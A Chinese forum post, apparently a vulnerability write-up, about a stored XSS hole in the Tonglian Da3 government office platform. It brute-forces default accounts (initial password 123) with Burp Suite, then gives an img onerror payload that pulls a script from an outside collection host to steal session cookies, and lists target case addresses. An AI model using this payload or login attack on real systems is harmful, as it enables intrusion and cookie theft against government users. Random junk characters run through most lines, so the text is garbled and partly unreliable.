5 _; x4 |; Y, x: u M; Q
& T# ^7 d' z% h$ V$ X# E; H
同联Da3协同办公平台后台通用储存型xss漏洞( K6 Z4 v m/ j& W9 {& K
& \% d: d6 \7 M. B" g
8 a+ U+ Z6 _! W n1 Y' }5 [ 平台简介:6 a- n$ d. x: O' n" `
" e4 |( ]5 n9 s' H( r# |; h 1 ^# `" K" R" T: Y2 W
( B$ [! |3 ^- Z8 j; t+ H$ r0 ?
) P$ N" u; d: Z % h. b- w/ O4 h
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
7 J* T2 q. t' W% H$ \5 P9 f同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
' Y. G8 ?% t: R( A
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
- Q/ q) Z8 g9 R% @* Z1 o
- D u$ W3 B* B( Y# }" Z
: Q' n: y: L0 ^( A1 ^
( K! }! c, X: n) ?
& t0 I# o* x9 Y y7 X) j( G) q- M
\2 m- c- X! s! ]& C* ] 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
; G) E, c8 e% q& Z. t; r, V/ Y
( j* @3 C. s: Z/ b7 k# D$ E
3 P* d+ {- d/ `) T+ ]9 G
) s1 k0 Y. v) u! V* Y( t5 D6 C: \
, |$ u0 I) @: i2 ~! z' f
! y N J! }- Y http://1.1.1.1:7197/cap-aco/#(案例2-)
$ D' P5 c @" z& T ~
; v! t: Q! \: F8 y6 m8 H& @7 b
0 @7 a* M) U. ^8 ^9 B) m1 i
http://www.XXOO.com (案例1-官网网站)# l% m( I I; f' o4 j; c. H
0 Q! g+ ?, i3 J' k2 z
2 Z6 P. k N& H8 h
漏洞详情:) Q+ _+ I+ s0 Q0 d
, K4 H8 U' D- ^& T' N0 |/ }6 @
& W6 w% c$ t4 l. }0 P0 h 案例一、
9 v* x9 D9 o7 r$ C% Q+ P
0 n' h" _4 L+ z. G
, l/ D4 `' j: V/ E
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
w" f! J; U& J Q& k: E3 l
2 s! ]- F1 e) j( h0 ^: M ) Y. l9 ]' M) F! e) g. ?
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
e5 B; ~- W1 i: J
& x" j" E5 q! [( ]8 I1 g
) K' l8 O r/ Q$ ` $ T2 _7 _0 L2 H- h( k; q! A
7 X7 i8 t& e2 b! N+ C7 ]; B/ E# q! Z
% _' t" J8 g) o4 O a 
: F1 ^2 e0 p) N: U3 H5 a! {" {
4 T3 Z% V. A& @
4 B# T G. n* L; [0 j
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: E$ `4 ` Z9 M
" }% M5 G, M3 Z $ R! Q5 G* A, V3 Y# h) P; N
* F: K; h! b3 U9 Q9 f
) D6 C* S" S' U; { 6 o7 q/ l7 R( e! y. y0 Z
* {8 p* F/ B; D: r2 b' L4 z5 s
& Y1 V5 R. {9 t1 O6 H) x' U; Z
3 f. Z7 @3 F. S, ]! W 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 0 ]! H) {0 H: p1 f4 G6 ?
% B2 L7 _7 i# F0 {8 d4 z( t% N h2 u
7 O% g: I) I2 b9 @+ P
( t5 S; x$ Q w" ^/ m _8 n3 D+ K
R) d0 y* C& |7 G9 b 3 z# |6 u9 i- U7 D
<img src=x0 b0 ]+ j8 G+ X7 g! u
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 3 \; b3 c3 ]7 V& e/ _- U
1 v8 m1 {7 `. Z! D/ I0 i: U
. q0 R3 l! ?6 P8 Z0 W- y% e 
; m/ {1 X$ b* ]! Q- n) Q
" k) v% L3 b$ y; T # R- D0 u1 {" e& p
然后发送,接收cookie如图: 1 e& i' d+ u( ]/ O- E
. T9 j5 X2 b, B* o- T
$ u j9 d" Z- |! t' ?/ P ) n5 Z, z) c0 R/ ^, S3 [4 a
) ]4 s% m& w# Q E' m3 G : j! R" Q. x, B3 ~4 ?" j% X+ Q
3 G) j- ~; K1 L9 q" p
# s) F" k5 @8 L; G* i6 a- N
* m. _( `6 W, m 4 F' g+ _# {3 ~; P2 J* T
# L' u/ ^* T3 X2 j1 O1 l
% I5 e/ S1 }2 N0 E$ `7 ?1 Z' a - r0 _9 F& x$ g) A
2 R6 F9 n; S: S% p# p3 y3 h : ?& k) X- v0 X
6 A3 v& e5 ^4 I0 K
& a! D. M5 Q) T5 |8 A0 Z4 b
+ J6 t+ k" w$ F, X4 v- d
$ O$ }4 v4 N3 H& a4 G3 v
& F) ?8 n/ R6 Z4 j# ]
5 w& A, Z; `( o
) z9 d [3 X% W6 n" Q2 }; z7 [
3 a& E* L5 h0 m1 |6 T0 v( c
1 `, L: F# p3 V3 q# u) m; k% w 案例2、
; y: H$ E% u0 q' l/ L
8 G' S# y' ^) W) v5 X! E6 r( R
3 f7 K* Q$ O" [& z) b4 W% O 前面步骤都一样,下面看效果图:
- I: u6 q$ }" G" \$ ~; F' {
8 p( ]% D* J9 Z7 s6 A, y3 F 4 ?7 `$ j! j8 b# K+ `, M" ?9 ~# w& W, U
# c. J0 h, G2 ]; R: y. ]
* Q8 q8 o( S5 Q0 L+ k" p
1 H+ @1 ^ S1 X8 _6 i$ Y! e 
) p/ z0 t+ q5 ]( f9 T& |
* D- m+ L. v9 U# }
/ ]! w6 P; z6 f; f4 a. m
! v' @, f* t1 K' K7 F# @; ~! i
! ^/ @' e6 V( m. T: T$ N( K2 C
' r% e5 o2 ?$ q+ O 2 J6 p0 r$ V) o" C" B; k$ @ R
7 F- X2 s- N$ W& @
- r! d( k/ w+ o( Z/ G5 V
5 E: G3 }; R2 N% P4 Z) |! s
# ? b1 B5 I2 a. B
3 j" w: \0 X. y7 e
0 v" i W' j/ X% H" ?9 e/ F
9 a7 _1 T! g# U7 q3 Q+ ^, ]/ ?5 l - V- W0 p- b: ^2 [. j' ?
+ e' P0 r3 G! Y/ t" r1 e* v) P
+ J2 q& `$ q2 t / @( e+ L: [; a
6 b" u% W) }6 P
9 U; x5 a& c8 |' M: M9 y . B1 C8 v. w: j; g7 Y8 t
) t1 ]2 h! W; v4 {" M# N$ }# @
% c8 r( q- [# l+ B* q; j 
发表于 2018-10-20 20:14:15
收藏
支持
反对